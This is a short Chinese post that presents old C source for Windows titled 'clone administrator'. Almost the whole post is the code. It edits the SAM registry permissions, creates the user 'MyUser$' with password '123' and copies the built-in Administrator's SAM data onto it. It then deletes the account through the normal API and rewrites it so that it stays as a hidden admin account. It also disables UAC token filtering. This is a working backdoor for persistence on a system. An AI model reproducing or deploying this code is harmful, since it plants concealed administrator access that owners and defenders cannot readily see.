克隆管理员代码

        翻看了N年前的代码，看到了这个。

#include <stdio.h>#include <aclapi.h>#include <windows.h> #include <lm.h>#pragma comment(lib, "netapi32.lib")typedef struct _KeyValue{PBYTE value;DWORD KeyLen;}KeyValue, *PKeyValue;typedef struct _UserRegVal{DWORD UserNum; // User IDKeyValue F;  // 0x100KeyValue V;  // 0x400}UserRegVal, *PUserRegVal;BOOL AddUser(PWCHAR UserName, PWCHAR Passwd){USER_INFO_1 ui;DWORD dwLevel = 1;DWORD dwError = 0;NET_API_STATUS nStatus;ui.usri1_name = UserName;ui.usri1_password = Passwd;ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;// add the usernStatus = NetUserAdd(NULL,dwLevel,(LPBYTE)&ui,&dwError);// successif (nStatus == NERR_Success){return TRUE;}return FALSE;}DWORD WriteObjectSecurity(int a1, LPWSTR pObjectName, int a3, PSECURITY_DESCRIPTOR bOwnerDefaulted){return 0;}VOID SetEveryOne(PWCHAR key){SetNamedSecurityInfoW( key, SE_REGISTRY_KEY, 0xB0000004, NULL, NULL, NULL, NULL);}DWORD SetAttribute(){DWORD result;PSECURITY_DESCRIPTOR pSecDesc;PACL pOldDACL, pNewDACL;EXPLICIT_ACCESS ea;GetNamedSecurityInfo(TEXT("MACHINE\\SAM\\SAM\\"), SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,NULL,NULL,&pOldDACL,NULL,&pSecDesc);BuildExplicitAccessWithName(&ea, TEXT("administrators"),READ_CONTROL|WRITE_DAC|GENERIC_ALL|SUB_CONTAINERS_AND_OBJECTS_INHERIT,  // FILE_READ_DATA|FILE_LIST_DIRECTORY|FILE_READ_ATTRIBUTES|FILE_READ_EA,SET_ACCESS, CONTAINER_INHERIT_ACE|OBJECT_INHERIT_ACE);result = SetEntriesInAcl(1, &ea, pOldDACL, &pNewDACL);if (result == ERROR_SUCCESS){result = SetNamedSecurityInfo(TEXT("MACHINE\\SAM\\SAM\\"),SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL);}return 0;}BOOL ReadUserReg(PWCHAR UserName, PUserRegVal UserReg){HKEY hKey;BOOL ntStatus = TRUE;DWORD KeyValue = 0;DWORD Type;PWCHAR buf = new WCHAR[MAX_PATH];wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s", UserName);// read admin F keylong lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SAM\\SAM\\Domains\\Account\\Users\\000001F4"), 0, KEY_READ, &hKey);if (lRet == ERROR_SUCCESS){Type = REG_BINARY;if (RegQueryValueEx(hKey, TEXT("F"), 0,&Type,UserReg->F.value, &UserReg->F.KeyLen) != ERROR_SUCCESS ){ntStatus = FALSE;}RegCloseKey(hKey);}else{ntStatus = FALSE;}// read user V keylRet = RegOpenKeyExW(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);if (lRet == ERROR_SUCCESS){Type = REG_BINARY;PTCHAR lpName = new TCHAR[0x16];DWORD lpcbName = 0x16;PBYTE lpData = new BYTE[0x8];DWORD lpcbClass = 0x8;if ( RegEnumValue(hKey, 0, lpName,&lpcbName,NULL,&Type,lpData,&lpcbClass) == ERROR_SUCCESS ){UserReg->UserNum = Type;wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\%08X", Type);RegCloseKey(hKey);// reg read user V keylRet = RegOpenKeyExW(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);if (lRet == ERROR_SUCCESS){Type = REG_BINARY;if (RegQueryValueEx(hKey, TEXT("V"), 0,&Type,UserReg->V.value, &UserReg->V.KeyLen) != ERROR_SUCCESS ){ntStatus = FALSE;}RegCloseKey(hKey);}else{ntStatus = FALSE;}}else{ntStatus = FALSE;}delete []lpData;delete []lpName;}else{ntStatus = FALSE;}delete []buf;return ntStatus;}// add the user into regeditBOOL SetUserReg(PWCHAR UserName, PUserRegVal UserReg){PWCHAR buf = new WCHAR[MAX_PATH];HKEY hKey;BOOL ntStatus = TRUE; wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\%08X", UserReg->UserNum);if( ERROR_SUCCESS == RegCreateKeyExW( HKEY_LOCAL_MACHINE,buf,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,0)){RegSetValueEx(hKey, TEXT("V"), 0, REG_BINARY, UserReg->V.value, UserReg->V.KeyLen);RegSetValueEx(hKey, TEXT("F"), 0, REG_BINARY, UserReg->F.value, UserReg->F.KeyLen);RegCloseKey(hKey);}else{ntStatus = FALSE;}wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s", UserName);if( ERROR_SUCCESS == RegCreateKeyExW( HKEY_LOCAL_MACHINE,buf,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,0)){RegSetValueEx(hKey, NULL, 0, UserReg->UserNum, NULL, NULL);RegCloseKey(hKey);}else{ntStatus = FALSE;}return ntStatus;}BOOL DelUser(PWCHAR UserName){NET_API_STATUS nStatus;// delete the usernStatus = NetUserDel(NULL, UserName);if (NERR_Success == nStatus){return TRUE;}return FALSE;}// clone the administrator setBOOL CloneAdmin(PWCHAR UserName, PWCHAR Passwd){// add userif (!AddUser(UserName, Passwd)){return FALSE;}// set Reg attribif (!SetAttribute()){return FALSE;}// copy the admin permissionUserRegVal value;value.V.value = new BYTE[0x400];if ( value.V.value != NULL ){value.V.KeyLen = 0x400;}value.F.value = new BYTE[0x100];if ( value.F.value != NULL ){value.F.KeyLen = 0x100;}ReadUserReg( UserName, &value);// delete userif (!DelUser(UserName)){return FALSE;}// set the Regedit permissionSetUserReg(UserName, &value);return TRUE;}// In Vista set the administrator not filter TokenBOOL SetFilterFalse(){HKEY hKey;BOOL ntStatus = TRUE;DWORD KeyValue = 0;long lRet = RegCreateKeyEx(HKEY_LOCAL_MACHINE,TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"),0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);if (lRet != ERROR_SUCCESS){return FALSE;}if (ERROR_SUCCESS != RegSetValueEx(hKey, TEXT("FilterAdministratorToken"), 0, REG_DWORD, (const unsigned char *) &KeyValue, 4) ){ntStatus = FALSE;}RegCloseKey(hKey);return ntStatus;}int main(int argc, char* argv[]){if ( SetFilterFalse() ){if ( CloneAdmin(L"MyUser$", L"123") ){MessageBox(NULL, TEXT("设置隐藏用户成功"), NULL, NULL);}}return 0;}